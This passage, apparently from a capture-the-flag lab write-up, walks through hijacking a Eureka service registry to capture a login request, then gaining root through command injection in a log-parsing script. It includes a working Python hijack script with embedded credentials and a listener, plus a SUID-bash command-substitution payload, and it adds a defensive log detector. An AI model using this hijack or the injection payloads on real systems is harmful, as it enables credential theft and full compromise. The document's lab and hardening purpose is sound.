The first command performs a POST request to register a new instance of the USER-MANAGEMENT-SERVICE application, with the instance details (instance ID, host, IP address, and port) supplied in an external instance.xml file. With the attacker's own machine details in that XML, Eureka believes the service is now reachable at the attacker-controlled host. The second command issues a DELETE request for the existing instance localhost:USER-MANAGEMENT-SERVICE:9009, the genuine application running locally on port 9009, so that the rogue instance is the only one left for the gateway to route to.
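The two Eureka calls described above, plus the listener that receives the redirected login POST, as an added Python example (not the author's curl commands). The application name, the EurekaSrvr credentials, port 8761 and the legitimate instance id come from the writeup; the host used to reach Eureka and the attacker's IP and port are assumptions and must be changed to match the lab.

```python
"""Eureka registration hijack from the writeup, expressed as Python instead of the
author's curl commands. Added example, not the original. The app name, the
EurekaSrvr credentials, port 8761 and the legitimate instance id come from the
writeup; EUREKA_HOST, ATTACKER_IP and ATTACKER_PORT are assumptions."""
import base64
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

EUREKA_HOST = "furni.htb"                                  # assumption: how 8761 is reached
EUREKA_APPS = f"http://{EUREKA_HOST}:8761/eureka/apps"     # Spring Cloud Eureka REST root
CREDS = ("EurekaSrvr", "0scarPWDisTheB3st")
APP = "USER-MANAGEMENT-SERVICE"
LEGIT_INSTANCE = "localhost:USER-MANAGEMENT-SERVICE:9009"
ATTACKER_IP, ATTACKER_PORT = "10.10.14.5", 8081            # assumption: attacker's VPN address


def build_instance_xml(app: str, ip: str, port: int) -> str:
    """Registration document with every address field pointed at the attacker host."""
    vip = app.lower()
    return (
        "<instance>"
        f"<instanceId>{ip}:{vip}:{port}</instanceId><hostName>{ip}</hostName><app>{app}</app>"
        f"<ipAddr>{ip}</ipAddr><vipAddress>{vip}</vipAddress><secureVipAddress>{vip}</secureVipAddress>"
        f'<status>UP</status><port enabled="true">{port}</port><securePort enabled="false">443</securePort>'
        f"<homePageUrl>http://{ip}:{port}/</homePageUrl>"
        f"<statusPageUrl>http://{ip}:{port}/actuator/info</statusPageUrl>"
        f"<healthCheckUrl>http://{ip}:{port}/actuator/health</healthCheckUrl>"
        '<dataCenterInfo class="com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo">'
        "<name>MyOwn</name></dataCenterInfo>"
        "</instance>"
    )


def plan_requests(app: str, legit_instance: str, ip: str, port: int) -> list:
    """The two calls the writeup describes: register the rogue instance, then evict the real one."""
    return [
        ("POST", f"{EUREKA_APPS}/{app}", build_instance_xml(app, ip, port)),
        ("DELETE", f"{EUREKA_APPS}/{app}/{legit_instance}", None),
    ]


def basic_auth(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def send(method: str, url: str, body) -> int:
    req = urllib.request.Request(url, data=body.encode() if body else None, method=method)
    req.add_header("Authorization", basic_auth(*CREDS))
    if body:
        req.add_header("Content-Type", "application/xml")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status          # 204 for a successful registration


class Catcher(BaseHTTPRequestHandler):
    """Logs whatever the gateway now forwards to 'user-management-service', e.g. the /login POST."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        print(self.command, self.path, self.rfile.read(length).decode(errors="replace"))
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    for method, url, body in plan_requests(APP, LEGIT_INSTANCE, ATTACKER_IP, ATTACKER_PORT):
        print(method, url, "->", send(method, url, body))
    HTTPServer(("0.0.0.0", ATTACKER_PORT), Catcher).serve_forever()
```

Eureka re-registers the genuine instance on its next heartbeat, so the DELETE only buys a window; the listener must already be up when the root cron job fires its login request into that window.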
A successful callback was received, which revealed system details tied to the user miranda.wise. This indicates that the malicious service registration worked as intended, and the compromised microservice forwarded traffic to the attacker-controlled host, exposing valuable information about another valid user account in the environment.
The user flag was captured by reading the user.txt file with the cat command.
Escalate to Root Privileges Access
Privilege Escalation:
We did not identify any unusual or exploitable SUID binaries on the system.
A script named log_analyse.sh was discovered on the system, which stands out as a potential target for further analysis to determine if it contains insecure commands, misconfigurations, or privilege escalation opportunities.
Analysis of log_analyse.sh Script
This script is a log analyser that examines server logs to track three things: who is logging in (successfully or not), which HTTP errors are occurring, and any system errors worth noting. It has some nice touches: colour-coded output for quick scanning and a clean report saved to log_analysis.txt.
In more detail, the script extracts login attempts, HTTP status codes, and errors, then saves the results to log_analysis.txt. A key function, analyze_http_statuses(), pulls the status value out of each line with grep -oP 'Status: \K.*' and then evaluates it. Nothing checks that the extracted value is a three-digit code, so a log line whose Status field contains a string such as $(malicious_command) is handed back to bash, which expands the command substitution when the value is evaluated. Anyone who can write to these logs can therefore run commands as whichever user executes the script.
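As an added example (not the writeup's script), here is the check the analyser should have performed before using the extracted value, turned into a detector that can be run over the same logs: it pulls out the Status field exactly as the grep does, accepts only an exact three-digit code, and labels anything else as a shell-expansion payload or a malformed status. The log lines are constructed, and the check goes beyond the single $(...) case in the text by also flagging backticks and ${...} expansions.

```python
"""Spotting shell-expansion payloads in log fields that log_analyse.sh re-evaluates.

Added example, not the writeup's script. The log lines are constructed. The
check goes beyond the single $(...) case in the text: it also flags backticks
and ${...} expansions, and treats anything that is not a three-digit status
code as unsafe to hand to bash."""
import re

# The same field the script pulls out with: grep -oP 'Status: \K.*'
STATUS_FIELD = re.compile(r"Status:\s*(.*)$")
# Constructs bash expands when a variable is evaluated in an unquoted or arithmetic context.
SHELL_EXPANSION = re.compile(r"\$\(|`|\$\{")
THREE_DIGIT_CODE = re.compile(r"[1-5]\d{2}")

SAMPLE_LOG = [  # constructed application.log lines
    "2025-08-24 10:01:02 INFO  GET /login Status: 200",
    "2025-08-24 10:01:03 WARN  GET /admin Status: 403",
    "2025-08-24 10:01:05 INFO  GET /x Status: $(cp /bin/bash /tmp/bash; chmod u+s /tmp/bash)",
    "2025-08-24 10:01:06 INFO  GET /y Status: `id > /tmp/pwned`",
    "2025-08-24 10:01:07 ERROR GET /z Status: 500 internal error",
    "2025-08-24 10:01:08 INFO  health check ok",          # no Status field at all
]


def extract_status(line: str):
    m = STATUS_FIELD.search(line)
    return m.group(1).strip() if m else None


def is_safe_status(value) -> bool:
    """What the script should have checked before using the value: an exact HTTP status code."""
    return value is not None and THREE_DIGIT_CODE.fullmatch(value) is not None


def find_poisoned_lines(lines) -> list:
    """(line number, reason, offending value) for every Status field that must not reach bash."""
    hits = []
    for n, line in enumerate(lines, start=1):
        value = extract_status(line)
        if value is None or is_safe_status(value):
            continue
        reason = "shell expansion" if SHELL_EXPANSION.search(value) else "non-numeric status"
        hits.append((n, reason, value))
    return hits


if __name__ == "__main__":
    for n, reason, value in find_poisoned_lines(SAMPLE_LOG):
        print(f"line {n}: {reason}: {value!r}")
```

The hardening lesson is the allowlist in is_safe_status: a value that is about to be compared numerically in a shell should be validated as a number first, because bash's arithmetic and unquoted contexts will otherwise expand whatever they are given.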
The output demonstrates the behavior of the log_analyse.sh script when executed, showing that it processes and reads the contents of application.log. This indicates that the scriptβs purpose is related to log handling, and analyzing its execution flow could reveal opportunities for manipulation or privilege escalation.
The original log file was copied, deleted, and then recreated from the copy. Because the containing directory was writable by our user, the recreated file was owned by miranda.wise rather than www-data, which made its contents writable by us.
Exploiting Bash SUID for Privilege Escalation
Our exploit script itself runs as miranda.wise, without root privileges; the payload only gains root when root's scheduled log_analyse.sh parses the poisoned logs.
It defines two target log files located in the user-management-service and cloud-gateway directories, then injects a malicious payload into them. The payload attempts to execute a command substitution by copying /bin/bash to /tmp/bash and setting the SUID bit, effectively creating a root-privileged shell. To achieve this, the script removes the original log files and replaces them with the crafted payload. Once the vulnerable process or script that parses these logs executes the injected content, the attacker gains elevated privileges via the SUID-enabled /tmp/bash.
We then executed the crafted bash file, which replaced the targeted log files with the injected payload, preparing for privilege escalation once the vulnerable service processes the modified logs.
Running the script produced no immediate effect, suggesting the logs remained unprocessed or required additional conditions.
After some time, the injected payload executed and created a SUID bash binary in /tmp, allowing privilege escalation. Running ls -l /tmp/bash confirmed the SUID bit, and executing /tmp/bash -p provided a root shell (the -p flag stops bash from dropping the effective UID it inherits from the SUID bit). From there, id confirmed root access, and the final step was reading root.txt in /root to obtain the root flag and complete the exploitation.
The root flag was retrieved by executing the cat root.txt command.